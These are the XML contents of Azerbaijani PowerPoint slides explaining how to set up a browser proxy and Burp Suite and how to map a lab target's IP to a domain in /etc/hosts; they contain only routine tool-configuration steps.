        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2075179"/>
            <a:ext cx="8733277" cy="3605776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048715" name="Düzbucaqlı 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6167336" y="5214026"/>
            <a:ext cx="1206230" cy="20428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16" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8733277" y="2367330"/>
            <a:ext cx="3349557" cy="2504440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brauzerdə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> şəkildə göstərilən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsinə giririk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97189" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="3294" r="15445" b="4669"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="7587575" cy="3929974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048717" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587575" y="77821"/>
            <a:ext cx="4863829" cy="2758441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>work Setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölməsini tapırıq və şəkildəki göstərilən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>düyməsinə basırıq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097190" name="Şəkil 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="15467" t="15334" r="12731" b="4823"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="3929975"/>
            <a:ext cx="7587575" cy="2879388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048718" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587574" y="3929974"/>
            <a:ext cx="5044344" cy="2542541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pəncərəsi açılır </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manuel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configurationu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seçirik</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>və</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Portu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazıb </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> düyməsini basırıq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2800"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8605"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06" name="Rectangle 15"/>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07" name="Freeform: Shape 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="10825122" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10825122"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY2" fmla="*/ 264816 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 10825122 w 10825122"/>
              <a:gd name="connsiteY3" fmla="*/ 3429000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 10105415 w 10825122"/>
              <a:gd name="connsiteY4" fmla="*/ 6593184 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 9969784 w 10825122"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 108251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97155" name="Şəkil 8" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126628" y="116729"/>
            <a:ext cx="6712552" cy="3540871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048608"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09" name="Düzbucaqlı 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126628" y="816121"/>
            <a:ext cx="4134255" cy="486383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22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z-Latn-AZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097156" name="Şəkil 11" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126628" y="2712151"/>
            <a:ext cx="9941199" cy="2545648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048610" name="Mətn Qutusu 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757329" y="650285"/>
            <a:ext cx="4067792" cy="891540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>İP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>Domainə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>yönləndirmək</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> üçün</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t>gedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t> /etc/hosts </a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048611" name="Mətn Qutusu 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339363" y="5317003"/>
            <a:ext cx="8380429" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t>Üçüncü boş olan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>sətirə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>ədəf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> sistemin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> sonra boşluq qoyub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1"/>
              <a:t>yönləndirəcəyimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domaini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> yazırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048612" name="Mətn Qutusu 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664588" y="6021115"/>
            <a:ext cx="4034672" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>:            192.168.1.105</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> :  fuadnihal.az</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ"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191" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="51883" y="189689"/>
            <a:ext cx="7762672" cy="6073245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048719" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889131" y="379379"/>
            <a:ext cx="4192621" cy="5120640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brauzerdə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etdiyimiz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parametrlərini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuitedə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> təkrarlayırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsindən  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Optionsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> seçirik aşağıdakı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> düyməsinə basırıq və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brauzerdə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yazdığımız</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Portu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurbSitedə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yazırıq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> düyməsinə basırıq</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97192" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="21067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="160256" y="197962"/>
            <a:ext cx="5533533" cy="221761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97193" name="Şəkil 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514680" y="83363"/>
            <a:ext cx="6431614" cy="6691273"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
